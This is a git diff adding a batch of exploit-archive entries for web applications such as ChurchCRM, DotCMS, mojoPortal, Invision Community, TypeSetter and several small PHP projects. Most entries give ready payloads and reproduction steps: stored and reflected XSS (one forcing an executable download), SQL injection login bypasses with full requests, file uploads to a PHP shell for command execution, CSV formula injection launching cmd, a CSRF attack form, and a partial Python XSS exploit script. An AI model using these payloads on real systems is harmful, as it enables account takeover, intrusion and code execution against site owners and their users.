new file mode 100644
index 000000000..1ea5902b9
--- /dev/null
+++ b/exploits/multiple/webapps/49161.txt
@@ -0,0 +1,17 @@
+# Exploit Title: Bakeshop Online Ordering System 1.0 - 'Owner' Persistent Cross-site scripting
+# Date: 26-11-2020
+# Exploit Author: Parshwa Bhavsar
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/14609/bakeshop-online-ordering-system-phpmysqli-full-source-code.html
+# Version: 1.0
+# Tested on: Windows 10/XAMPP
+
+Payload : "><img src=x onerror=alert(1)>
+
+
+Steps to Reproduce :-
+
+1. Login in admin dashboard & Click on 'Categories'.
+2. You will notice the "New" button ,Click on that and You will notice the "Category" input field.
+3. Put  XSS Payload on that field and save it.
+4. XSS will be triggered.
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49162.txt b/exploits/multiple/webapps/49162.txt
new file mode 100644
index 000000000..7e3683680
--- /dev/null
+++ b/exploits/multiple/webapps/49162.txt
@@ -0,0 +1,33 @@
+# Exploit Title: Online News Portal System 1.0 - 'Title' Stored Cross Site Scripting
+# Date: 24-11-2020
+# Exploit Author: Parshwa Bhavsar
+# Vendor Homepage: https://www.sourcecodester.com/php/14600/online-news-portal-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/online-news-portal.zip
+# Version: 1.0
+# Tested on: Windows 10/XAMPP
+
+Stored Cross-site scripting(XSS):
+Stored XSS, also known as persistent XSS, is the more damaging of the
+two. It occurs when a malicious script is injected directly into a
+vulnerable web application.
+
+Attack Vector :
+
+This vulnerability can result in the attacker to inject the XSS
+payload in the Title field of the page and each time any user will
+open the website, the XSS triggers and attacker can able to steal the
+cookie according to the crafted payload.
+
+Vulnerable Parameters: Title Parameter in Edit Post Page.
+
+Payload : "><img src=x Onmouseover=alert(document.domain)>
+
+Vulnerable URL :
+http://localhost/online-news-portal/news_portal/admin/index.php?page=new_post
+
+Steps To Reproduce :
+1) Go to the admin Dashboard
+2) Click on Posts and click Add New button.
+3) Put Payload into the Title parameter.
+4) Click on Save.
+5) XSS payload will be triggered.
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49163.txt b/exploits/multiple/webapps/49163.txt
new file mode 100644
index 000000000..a77aed857
--- /dev/null
+++ b/exploits/multiple/webapps/49163.txt
@@ -0,0 +1,28 @@
+# Exploit Title: Local Service Search Engine Management System 1.0 - SQLi Authentication Bypass
+# Date: 21/11/2020
+# Exploit Author: Aditya Wakhlu
+# Vendor Homepage: https://www.sourcecodester.com/php/14607/local-service-search-engine-management-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/lssems.zip
+# Version: 1.0
+# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+
+Step 1: Open the URL http://localhost:8080/lssems/admin/login.php
+Step 2: use payload Aditya' or 1=1# in user and password field
+
+Malicious Request:::
+
+POST /lssems/admin/ajax.php?action=login HTTP/1.1
+Host: localhost:8080
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 49
+Origin: http://localhost:8080
+Connection: close
+Referer: http://localhost:8080/lssems/admin/login.php
+Cookie: PHPSESSID=mpqu31slfcd7fjc89gm9veb1o3
+
+username=Aditya'+or+1%3D1%23&password=Aditya'+or+1%3D1%23
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49166.txt b/exploits/multiple/webapps/49166.txt
new file mode 100644
index 000000000..ea9bb5cfc
--- /dev/null
+++ b/exploits/multiple/webapps/49166.txt
@@ -0,0 +1,16 @@
+# Exploit Title: Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated)
+# Date: November 17th, 2020
+# Exploit Author: Shahrukh Iqbal Mirza (@shahrukhiqbal24)
+# Vendor Homepage: Source Code & Projects (https://code-projects.org)
+# Software Link: https://download.code-projects.org/details/9dfede24-03cc-42a8-b319-f666757ac7cf
+# Version: 1.0
+# Tested On: Windows 10 (XAMPP Server)
+# CVE: CVE-2020-28688
+---------------------
+Proof of Concept:
+---------------------
+1. Authenticate as a user (or signup as an artist)
+2. Click the drop down for your username and go to My ART+BAY
+3. Click on My Artworks > My Available Artworks > Add an Artwork
+4. Click on any type of artwork and instead of the picture, upload your php-shell > click on upload
+5. Find your shell at 'http://<ip>/<base_url>/pictures/arts/<shell.php>' and get command execution
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49167.txt b/exploits/multiple/webapps/49167.txt
new file mode 100644
index 000000000..398170498
--- /dev/null
+++ b/exploits/multiple/webapps/49167.txt
@@ -0,0 +1,15 @@
+# Exploit Title: Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile
+# Date: November 17th, 2020
+# Exploit Author: Shahrukh Iqbal Mirza (@shahrukhiqbal24)
+# Vendor Homepage: Source Code & Projects (https://code-projects.org)
+# Software Link:  https://download.code-projects.org/details/9dfede24-03cc-42a8-b319-f666757ac7cf
+# Version: 1.0
+# Tested On: Windows 10 (XAMPP Server)
+# CVE: CVE-2020-28687
+--------------------
+Proof of Concept:
+--------------------
+1. Authenticate as a user (or signup as an artist)
+2. Go to edit profile
+3. Upload a php-shell as profile picture and click update/save
+4. Find your shell at 'http://<ip>/<base_url>/pictures/profile/<shell.php>' and get command execution
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49168.txt b/exploits/multiple/webapps/49168.txt
new file mode 100644
index 000000000..2e93d68f2
--- /dev/null
+++ b/exploits/multiple/webapps/49168.txt
@@ -0,0 +1,15 @@
+# Exploit Title: DotCMS 20.11 - Stored Cross-Site Scripting
+# Exploit Author: Hardik Solanki
+# Vendor Homepage: https://dotcms.com/
+# Version: 20.11
+# Tested on Windows 10
+
+Vulnerable Parameters: Template Title
+
+Steps to reproduce:
+1. Login With Admin Username and password.
+2. Navigate to Site --> Template --> Add Template Designer
+2. Entre the payload <script>alert(document.cookie)</script> in Template
+Title.
+3. Now Navigate to Site --> Template. We could see that our payload gets
+executed. And hence it executed every time.
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49170.txt b/exploits/multiple/webapps/49170.txt
new file mode 100644
index 000000000..343df0c12
--- /dev/null
+++ b/exploits/multiple/webapps/49170.txt
@@ -0,0 +1,19 @@
+# Exploit Title: WebDamn User Registration & Login System with User Panel - SQLi Auth Bypass
+# Date: 18-11-2020
+# Exploit Author: Aakash Madaan
+# Vendor Homepage: https://webdamn.com/
+# Software Link : https://webdamn.com/user-management-system-with-php-mysql/
+# Version: N/A (Default)
+# Tested on: Windows 10 professional
+
+Steps to reproduce:
+1. Open user login page using following URl:
+-> http://localhost/login.php <http://localhost/login.html>
+
+2. If attacker get access to valid email address ( leaked data or by any
+other means) then he/she can use the email address as follows:
+Payload: <email>' OR '1'='1
+NOTE: Use the above payload in both username and password fields
+
+3. Server accepts the payload and the attacker is able to bypass the user
+login panel with only email address.
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49171.txt b/exploits/multiple/webapps/49171.txt
new file mode 100644
index 000000000..66a49e972
--- /dev/null
+++ b/exploits/multiple/webapps/49171.txt
@@ -0,0 +1,22 @@
+#Exploit Title: ChurchCRM 4.2.1- CSV/Formula Injection
+#Date: 2020- 10- 24
+#Exploit Author: Mufaddal Masalawala
+#Vendor Homepage: https://churchcrm.io/
+#Software Link: https://github.com/ChurchCRM/CRM
+#Version: 4.2.0
+#Payload:  =10+20+cmd|' /C calc'!A0
+#Tested on: Kali Linux 2020.3
+#Proof Of Concept:
+CSV Injection (aka Excel Macro Injection or Formula Injection) exists in
+List Event Types feature in ChurchCRM v4.2.0 via Name field that is
+mistreated while exporting to a CSV file.
+To exploit this vulnerability:
+
+   1. Login to the application, goto 'Events' module and then "List Event
+   Types"
+   2. Edit any event and inject the payload =10+20+cmd|' /C calc'!A0 in the
+   'Name' field
+   3. Now goto 'List Event types' module and click CSV to download the CSV
+   file
+   4. Open the CSV file, allow all popups and our payload is executed
+   (calculator is opened).
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49172.txt b/exploits/multiple/webapps/49172.txt
new file mode 100644
index 000000000..47a844f6b
--- /dev/null
+++ b/exploits/multiple/webapps/49172.txt
@@ -0,0 +1,17 @@
+#Exploit Title: ChurchCRM 4.2.1- Persistent Cross Site Scripting(XSS)
+#Date: 2020- 10- 29
+#Exploit Author: Mufaddal Masalawala
+#Vendor Homepage: https://churchcrm.io/
+#Software Link: https://github.com/ChurchCRM/CRM
+#Version: 4.2.1
+#Tested on: Kali Linux 2020.3
+#Proof Of Concept:
+ChurchCRM application allows stored XSS , via 'Add new Deposit' module, that is rendered upon 'View All Deposits' page visit. There are multiple locations where this can be replicated To exploit this vulnerability:
+
+   1. Login to the application, go to 'View all Deposits' module.
+   2. Add the payload ( <script>var link = document.createElement('a');
+   link.href = 'http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe';
+   link.download = ''; document.body.appendChild(link); link.click();
+</script>
+   ) in the 'Deposit Comment' field and click "Add New Deposit".
+   3. Payload is executed and a .exe file is downloaded.
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49182.txt b/exploits/multiple/webapps/49182.txt
new file mode 100644
index 000000000..c82f2cb0b
--- /dev/null
+++ b/exploits/multiple/webapps/49182.txt
@@ -0,0 +1,20 @@
+# Exploit Title: EgavilanMedia Address Book 1.0 Exploit - SQLi Auth Bypass
+# Date: 02-12-2020
+# Exploit Author: Mayur Parmar(th3cyb3rc0p)
+# Vendor Homepage: http://egavilanmedia.com
+# Software Link : http://egavilanmedia.com/egm-address-book/
+# Version: 1.0
+# Tested on: PopOS
+
+Attack Vector:
+An attacker can gain admin panel access using malicious sql injection queries.
+
+Steps to reproduce:
+1. Open admin login page using following URl:
+-> http://localhost/Address%20Book/login.php
+
+2. Now put below Payload in both the fields( User ID & Password)
+Payload: admin' or '1'='1
+
+3. Server accepted our payload and we bypassed cpanel without any
+credentials
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49184.txt b/exploits/multiple/webapps/49184.txt
new file mode 100644
index 000000000..4ec2ea96b
--- /dev/null
+++ b/exploits/multiple/webapps/49184.txt
@@ -0,0 +1,42 @@
+# Exploit Title: mojoPortal forums 2.7.0.0 - 'Title' Persistent Cross-Site Scripting
+# Date: 3-12-2020
+# Exploit Author: Sagar Banwa
+# Vendor Homepage: https://mojoportal.com
+# Software Link: https://www.mojoportal.com/download
+# Version: 2.7.0.0
+# Tested on: Windows 10/Kali Linux
+
+Attack vector:
+This vulnerability can results attacker to inject the XSS payload in Add Forum title section and each time admin visits the View Detail of Forum section from admin panel, the XSS triggers and attacker can able to steal the cookie according to the crafted payload.
+
+Vulnerable Parameters: Edit Forum 'Title :'.
+
+Steps-To-Reproduce:
+1. Login to the Admin Account 
+2. Go to the Forums.
+3. click on Add Forum.
+4. Add payload to Title: <script>alert(1)</script>
+5. Click on Create New Forum.
+6. As soon as admin or any visitor visit the forum the XSS payload will triage.
+
+
+Post Request -
+'''
+
+POST /Forums/EditForum.aspx?mid=1275&pageid=756 HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://localhost/Forums/EditForum.aspx?mid=1275&pageid=756
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 5037
+Origin: https://localhost
+Connection: close
+Cookie: ASP.NET_SessionId=[removed]; _ga=GA1.2.1772464100.1606932969; _gid=GA1.2.1379348562.1606932969; returnurl25=https://localhost/; .mojochangeme=7ECC859CF4455C5CAE01964464A1029D676213BFF565B38E31D6AE3CF45C212B26FEF4451D2565510EFC1FBEE1A0002322CB05C272CFF74A5F2BDD798286542EA2BC30A889ABDC6D74502865A66DECF250F715A55C510F2DFDBCA1865D3DF436DA579221; localhostportalroles25=3119B16DC158DE7032105189AE61DB79F7043A498D422DABE9485B15E18E299E5C3B1C0696B736560172F2435276EF79EBF5D93A714F285B6EAEB16B648CB2EA4C7AE691B25D00EF4AD168393EFB423ED302A355C340B5D11AA9C7F44BDA6767678C3212BAA3B2991B38D1971836A62C0A1E2EF7AA36FE5DFE1BDAFF077F785F74B360520BA5793271671755790ED2BB9E98199A; fwAdminDrawer=close; _gat=1
+Upgrade-Insecure-Requests: 1
+
+__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATEFIELDCOUNT=7&__VIEWSTATE=8GbpJWPoYrikzpEsM5g5Oyxg%2Fw3otQN%2Bp%2FxL2%2BIM8Cb0gFtj%2BUt4LWZm2SnDpq2wFeoZ5CxcLmEwnfTYfX3zUCO8ullGYZmsvrRPgkCmd4Q8Ziuu9bC6xpnpvd3zY2u2%2FmkVsmTINB4RJfAFk%2FM2RGngO7YcBtMIdKm1B0Mca3Lzwk9SbGZ%2BrkzOKF%2FMw%2Fev0rDciq1cZ2EfgKa6cfHhN9Rdo1CK3u%2FaGhGTXDMq4kgcV8VmtKYzMd60hoYTtdj%2B6xVyW2kJ0W6uYuzNZy4ctGRethu2TDkK%2Bp3Jt69X2iL07JQmXYFL4Nouh%2FF5nR3dDnhT50x%2F7ezT%2BRKLpwnBPrqE2XRgsR9eCwyV59d6NIxNos6fD3rYmhRgONXeinpuRxe8AFElCPOnFXJz7nhtBNkUx9xl2jx95l6CS7wE8wQtFQc5PWUlJ7r1junVJ5oUmFhLEjDXn7qJ%2Fn9kBHDzTjYI7Epq%2Fo8uS9FRO0PeNyQLqUlRW5Ig&__VIEWSTATE1=xhUOYE%2FB05kVdGbeLy9qSX0k5X6mJ0pwbklHcDgNHAdlV6yKobnEZLVzA11ZLSVTDLlg1anxthz4S3MKQLjEcxWd8EbQ6TFFyuR4Ey6ZQlHXc4YXVzaRdBe8XPsfbZrh6fqBJab90XjGQZoAMeE3mDqXVKo7oeA5YpZn4bfBHNxj8el8vs%2B5QbAD5INtXMzVMLrtoNxHRlPjtn7u2LiRHXS7mal7GPJ2RD48rh1sEBkohr91gAxGBLdl3H3rT%2Fo1ACtQU8sNRceeV1XhgEbjPyweu6L2FPtyWxyQXma76osWfXkftyt3dloWIywM201r3ByGOAxR%2BtpFpj3IwIoyEJvvUnJ3UcteS6DiG2QqebBaVAl%2B4NzTAhMOg3%2FX%2Fa5%2BZC8lZ71yf8U5GF58DcCEI36PvnQOlKlKuO2CsO0iOTXf8UYirVNV%2F6qqgwru0P5HhCulGGM%2BTrUswOWEZYkMzoyjeRwt54PUOKaAllJrYBy4UwYjs7Ma&__VIEWSTATE2=ME%2FnWlF9Jj7LFvrQ3J6B24%2FZAdATYRBm7MuM%2FZQ%2B2ft4PF%2BONy1JWKH%2F46T%2BS9ni%2FjOnj8TN9ACNlJlfGkhfmhXBCBaLpf5o2h58ucOACihtCaSmjixiv%2B1SM7DKYp3l3SRp0DrHZWLy9bHZIV1qFNOyudHvIMHy8mYC5dlH5vvFVcDC%2BZeAbCbOeYVBLlnKXatlNf3x91urPZhemx35uzEied9Tk7w8W3o5W5W5a9vWLrBkEg4Mhm5IHx0qTn9LHLP5dNi6EQnM%2B%2FE1%2FRcJoZq1%2BkjhBOPGx1M7EVg%2BnXzJLy1%2BnXEf5D64P6pS8HdNtxQOtLgP4RC9YFWzkMhRI%2B9B71cPQfRHKAJCB3idIBtvQ7OhmArPbsq0pOvmfOF7c3dsy0NyY8KtVTlGaL1km5H1Q2SZdn1yMmnaeGlOgoioPM7fSZ8u%2BE%2BtQkvuPY5afsnt1H%2BUmGBGbiZZZR1%2BR%2FkvUANhzOHnLfuXcloItlRnvpKF0gIW&__VIEWSTATE3=VG3JlCj%2FguoAhsgsZxvtFo51ac%2FZob3zGU3iuvj56w2XljOxYhJ25EqC%2BaJjbgyCCSgF%2FIUQ8XIdHtIOBKvDhyv%2BWhlPdttXTOzBKk9EW6swSmZN9TNVL32jDq5suMPMrh9SsNj7b62O0ycjpCeVPRGfCThjWYxu0GwFiy%2Fnd65fr6BUCiaoTliKw%2Bvnh3IMw0CQSu5VdL0Y4h2R5hiomNKkcfqjFN%2BXtj9UrXNqOS13QZ9TP1NLf0Q2CXQ%2FjZvwSM9koJlEZ3Z2xfvOo4VXU92ONV%2FuBg3ugFTpw9NcEVnU5C5HDDQdQJpYqrUpRpIOaDru80pqBz90shkebGCRnbbeSAaZb%2FpcBsSNnmpftBSftR0nZYMX3VAAJaxjyehbtfLsmbHPuCdzyLOsqMPaFClG00yAR%2BbmuKIv2veSZ6GBGQjM14jrRoWgqZmF711tfCIfEDYErBz5%2BGC%2F4xz8gv44z%2BSF8VKk4s5dOCKZo1YZQ7yFqSYD&__VIEWSTATE4=z%2FvLRzX2nqqUfDd9UEeZG%2Bowmey7SmdvonndNsjZWX35cB4FiARHvWJhnHIoJEY2%2BJB6bFM8628%2B35cnidhq5iboc6dhqAo%2Fl9VbFfp4rxq%2BGh%2Bw%2Fu%2BNiyai3o6LWuy5cWxRnAMrlNhErHm86uVj1HTosQbBDhd0PU7yVTS2dEtfi3GggBfVDFn2eLh4sr6iSkN85RPhENouvNKl6PmHhhaFl4poe6etmjh63vYipPoY1VvYz2h%2BDisT5lEo7NYOhchYv%2FIQPuGkPBjkdTqtqourBuYw0pzLGRA1zf8X0UgwWnJVT8RLaf3Bp0uatXoatA%2FIo5j1Lggxm9cM2GFH7%2FrYDwAyPgWF%2BtLgqQUpnZoQoeIh62uPykr3p5pKsWXpKdtz4IINfyH%2BE0CH2gj96zVM76zFHdYt59%2Bs%2BZgu5i%2Bzf3icKJWlZaJiLzfEpSwIQijjvzC5CxwEAoO1LfnupW%2FZFWt%2FwsDXOZl2tgAunHfXe4sv4YHu&__VIEWSTATE5=8E0NZMBOC6vc%2Fm%2F%2FPv1X3U9D8PHM%2F60zTW2Fgz%2FDdau3xuxrxCd6EkTpHliKnJld0hjuEnMan6KZGs3sy59qTLc%2FOAU5Y%2Bg4FtWPugB%2B8faI4wtWGpLlR%2F2%2FhVyIer702HqYaZe2YtmG3FzYsEP5iNdWBIVAHG%2B285uMPcrARf7t7RNbnVLYe2hR4g6rm%2B3cz7Xlvl0hW1gtdYBLtD4x8eGpNWXsrZEdc9jjsRgDfd12VsDVZeIYxA5llNAQYyLLcv1czlYtLC2rT2cay3LZ3bCz5KvNOiNQNc4PjL5bXBFGlz9BCztmCHaxWXkhytsFQJOND2HqK6ZcBSsXFur9XKjdhkVbLJUGY6hd9zlqurehbzaS9qJFe2g1DTCuJeN39qqcjJk3ev3TOQbu9Q2RX2VEFF8Mdd8WFRdaJ7JJN5kzkmVgtcjmrhHZjpsZEGVYmL0A3HbXukjVBb8kHoOA1MzUagoa6kwmCNfNCmGgbKKZVSm90HF5&__VIEWSTATE6=O%2BS12LR2Z4oVhKLtpr07dZf4n4xaCnf%2BvWZpBROiixTdpBGO4Eg3J%2B2UqaWIrBm2FJjY%2B2NAG6EiGHDpYEzCuBEHQQg3RzT0co%2F0MXY0Vp%2FvhG5voMgkx24Zixl3Z2RcJ7GFNDyF2hDwZmEhmR8d5Xeh%2FlkLsGc4vHL7SAXLwg5lSPgLb8wTEPDv2WkOChlXK%2BKAUm5v6N4o3dv9j9fztlHsS%2FFXHM1HvYfH%2BX5UPFAfvCkiiK6iXbrQsvVRVX9KBvWmMdBLC4FHSX8BO6qy2U8d2TaJIG2YfewgUHkGWMEvhqFqsTyetatA&__VIEWSTATEGENERATOR=28F0A2BA&__EVENTVALIDATION=MhCP0%2FosgOAGG9hof6m2uvCclDI3J3ur9418exWCyHZn20PSWqlYEBB584LM%2Fwt7LEIk5phX%2F%2FnqL9ZAiCGAwuqvm%2FS9%2FjvzaXlbQf9H0qlhD30h7hKVA1zy%2FQB1rQh8Nbmh3tjczNLrHj%2BY%2FlybGM%2BEyN%2BelhoN8Q%2FOykCziCKgbY9tDeDf4S%2FWsjzOoEGyOpijMEyEq0ikBrY26gO4X0GeiV6Yw6LvTHt5PL%2FNElgUT%2BCw%2B0loxrz5QgIKuKqozFkU08iSXgsVrNJKUFD%2FJaUPeaDRiNUjYsMQq5qXop%2F1%2B3lUT1XDP1MelFUveIeo4AxsnA%2FhoiB48O69ScQY0J6WTvQo%2B%2FpY6Cn4Din2x5QvSigzwCJtqI3F%2BSWxlZzYSeJCq1uQlw2lboNaJhOoDSDTUG3cO3Oy18WG6PHcKbZHgq%2BPDJq6RvXq50a9Z36J4lnFpQmRofOaSpXR7e0uoBo6VYatMOcu3uWC6WKq6%2F8I0G88OKDIXdU8mQyTr%2B4IfZ2tAwNkfhQQyOOPOQKjJOPGOYnH14ozP58d7PNrMbUQKCwyimsUbox5uLQclzM5wK4x1mV9FqA9PZOy1Q9ApKyLotkAJbTdVmBkDQ1ZKOUd9GOBgg%2BAOuVokVGF8qCF4NYZjBZjpfW0OmihSu%2BXiONqPoa6K5483r8tF0%2F5Hch2K4XggkPqA%2B%2FVmfHr%2BkwKb7RUbQ%3D%3D&ctl00%24mainContent%24txtTitle=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&ctl00%24mainContent%24edContentinnerEditor=&ctl00%24mainContent%24txtSortOrder=100&ctl00%24mainContent%24txtPostsPerPage=10&ctl00%24mainContent%24txtThreadsPerPage=40&ctl00%24mainContent%24allowedPostRoles%24ctl00%242=Authenticated+Users&ctl00%24mainContent%24txtModeratorNotifyEmail=&ctl00%24mainContent%24chkIncludeInGoogleMap=on&ctl00%24mainContent%24btnUpdate=Create+New+Forum&ctl00%24mainContent%24hdnReturnUrl=https%3A%2F%2Flocalhost%2Fforums
+
+'''
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49188.txt b/exploits/multiple/webapps/49188.txt
new file mode 100644
index 000000000..198aa9c9d
--- /dev/null
+++ b/exploits/multiple/webapps/49188.txt
@@ -0,0 +1,39 @@
+# Exploit Title: Invision Community 4.5.4 - 'Field Name' Stored Cross-Site Scripting 
+# Date: 02-12-2020
+# Exploit Author: Hemant Patidar (HemantSolo)
+# Vendor Homepage: https://invisioncommunity.com/
+# Software Link: https://invisioncommunity.com/buy
+# Version: 4.5.4
+# Tested on: Windows 10/Kali Linux
+
+Vulnerable Parameters: Profile - Field Name.
+
+Steps-To-Reproduce:
+1. Go to the Invision Community admin page.
+2. Now go to the Members - MEMBER SETTINGS - Profiles.
+3. Now click on Add Profile field.
+4. Put the below payload in Field Name:
+"<script>alert(123)</script>"
+5. Now click on Save button.
+6. The XSS will be triggered.
+
+
+POST /admin/?app=core&module=membersettings&controller=profiles&tab=profilefields&subnode=1&do=form&parent=3&ajaxValidate=1 HTTP/1.1
+Host: 127.0.0.1
+Connection: close
+Content-Length: 660
+Accept: */*
+DNT: 1
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Origin: https://127.0.0.1
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: https://127.0.0.1/admin/?app=core&module=membersettings&controller=profiles
+Accept-Encoding: gzip, deflate
+Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7,ru;q=0.6
+Cookie: XYZ
+
+form_new_activeTab=&form_new_submitted=1&csrfKey=3ffc7a5774ddc0d2a7142d2072191efc&MAX_FILE_SIZE=20971520&pf_title%5B1%5D=%3Cscript%3Ealert(123)%3C%2Fscript%3E&pf_desc%5B1%5D=Test&pf_group_id=3&pf_type=Text&pf_allow_attachments=0&pf_allow_attachments_checkbox=1&pf_content%5B0%5D=&pf_multiple=0&pf_max_input=0&pf_input_format=&pf_member_edit=0&pf_member_edit_checkbox=1&radio_pf_member_hide__empty=1&pf_member_hide=all&radio_pf_topic_hide__empty=1&pf_topic_hide=hide&pf_search_type=loose&pf_search_type_on_off=exact&radio_pf_profile_format__empty=1&pf_profile_format=default&pf_profile_format_custom=&radio_pf_format__empty=1&pf_format=default&pf_format_custom=
\ No newline at end of file
diff --git a/exploits/php/webapps/49128.txt b/exploits/php/webapps/49128.txt
new file mode 100644
index 000000000..bd685474d
--- /dev/null
+++ b/exploits/php/webapps/49128.txt
@@ -0,0 +1,68 @@
+# Exploit Title: TypeSetter 5.1 - CSRF (Change admin e-mail)
+# Exploit Author: Alperen Ergel
+# Software Homepage: https://www.typesettercms.com/
+# Version : 5.1
+# Tested on: Kali & ubuntu
+# Category: WebApp
+
+######## Description ########
+
+Attacker can change admin e-mail address 
+
+## Vulnerable
+
+- Go to the admin page view preferences
+- Change the e-mail address
+
+######## Proof of Concept ########
+
+===> REQUEST <==== 
+POST /typesetter/Admin/Preferences HTTP/1.1
+Host: http://localhost/
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 237
+Origin: http://localhost/
+Connection: close
+Referer: http://localhost/typesetter/Admin/Preferences
+
+## < SNIPP > 
+
+
+verified=6cab21b263dafc079bc056b7e0f0610c37d1a5af46f252e24d537afa906baed776c370cb24709d8795842c0a86eb2d76e4300d529ebb5c0840fd5096c96c748c
+&email=demo%40mail.com&oldpassword=&password=&password1=&algo=password_hash&cmd=changeprefs&aaa=Save
+
+#### Attack Code ####
+
+<html>
+
+  <body>
+
+    <form action="http://localhost/typesetter/Admin/Preferences" method="POST">
+
+      <input type="hidden" name="verified" value="6cab21b263dafc079bc056b7e0f0610c37d1a5af46f252e24d537afa906baed776c370cb24709d8795842c0a86eb2d76e4300d529ebb5c0840fd5096c96c748c" />
+
+      <input type="hidden" name="email" value="[CHANGE HERE]" />
+
+      <input type="hidden" name="oldpassword" value="" />
+
+      <input type="hidden" name="password" value="" />
+
+      <input type="hidden" name="password1" value="" />
+
+      <input type="hidden" name="algo" value="password&#95;hash" />
+
+      <input type="hidden" name="cmd" value="changeprefs" />
+
+      <input type="hidden" name="aaa" value="Save" />
+
+      <input type="submit" value="Submit request" />
+
+    </form>
+
+  </body>
+
+</html>
\ No newline at end of file
diff --git a/exploits/php/webapps/49129.txt b/exploits/php/webapps/49129.txt
new file mode 100644
index 000000000..052cc128b
--- /dev/null
+++ b/exploits/php/webapps/49129.txt
@@ -0,0 +1,32 @@
+# Exploit Title: Joomla! Component GMapFP 3.5 - Unauthenticated Arbitrary File Upload
+# Google Dork: inurl:''com_gmapfp''
+# Date: 2020-03-27
+# Exploit Author: ThelastVvV
+# Vendor Homepage: https://gmapfp.org/
+# Version:Version J3.5 /J3.5free
+# Tested on: Ubuntu
+# CVE: CVE-2020-23972
+
+# Description:
+
+An attacker can access the upload function of the application without authenticating to the application and also can upload files due the issues of unrestricted file uploads which can be bypassed by changing the content-type and name file too double extensions 
+
+# PoC:
+
+
+Version J3.5
+http://127.0.0.1/index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=edit_upload
+
+-Once the attacker can locate the unauthenticated file upload form then the attacker can bypass the restriction by changing content-type and name file double extensions file.html.gif then can open file.html
+
+# Impact
+the attacker can upload malicious files can cause defacement of the site or uploading large amount of file til causes denial of service attack to Webapp/Server
+
+# Dir File Path:
+http://127.0.0.1///images/stories/gmapfp/test.html.gif
+http://127.0.0.1///images/stories/gmapfp/test.html
+http://127.0.0.1///images/gmapfp/test2.html.gif
+http://127.0.0.1///images/gmapfp/test2.html.gif
+
+
+# Issues are fixed,Please update to Last Version
\ No newline at end of file
diff --git a/exploits/php/webapps/49130.py b/exploits/php/webapps/49130.py
new file mode 100755
index 000000000..0f3cda681
--- /dev/null
+++ b/exploits/php/webapps/49130.py
@@ -0,0 +1,80 @@
+# Exploit Title: Wordpress Plugin EventON Calendar 3.0.5 - Reflected Cross-Site Scripting
+# Date: 27.11.2020
+# Exploit Author: b3kc4t (Mustafa GUNDOGDU)
+# Vendor Homepage: https://www.myeventon.com/
+# Version: 3.0.5
+# Tested on: Ubuntu 18.04
+# CVE : 2020-29395
+# Description Link:
+https://github.com/mustgundogdu/Research/tree/main/EventON_PLUGIN_XSS
+
+"""
+                 ~ VULNERABLITY DETAILS ~
+    
+    https://target/addons/?q=<svg/onload=alert(/b3kc4t/)>
+    
+    #
+    WordPress sites that use EventOn Calendar cause reflected xss vulnerability to javascript payloads injected 
+    into the search field.
+    
+    #
+    The following python code will inject javascript code and print out url that will be sent to victim. 
+    If you use unicode caracters for xss , exploit will print page source.
+
+    ##USAGE##
+    
+    $ sudo python eventon_exploit.py --exploit --url https://target/addons/?q= --payload '<svg/onload=alert(/b3kc4t/)>'
+
+    ##OUTPUT##
+
+    [+] https://target/addons/?q=<svg/onload=alert(/b3kc4t/)>
+
+
+"""
+import requests
+import sys
+import argparse
+from colorama import Fore
+        
+def vuln_reflected(url, payload):
+
+    s = requests.Session()
+    get_request = s.get(url+payload)
+    
+    if get_request.status_code == 500:
+        print(Fore.GREEN+"[-] COULD BE WAF, NOT BE REALIZED XSS INJECTION [-]")
+
+    else:
+        content_result = str(get_request.content)
+        search_find = content_result.find(payload)
+
+        if search_find != -1:
+            print(Fore.GREEN+"[+] "+str(url)+str(payload))
+
+        else:
+
+            print(content_result)
+
+
+def main():
+
+    desc = "Wordpress EventON Calendar Plugin XSS"
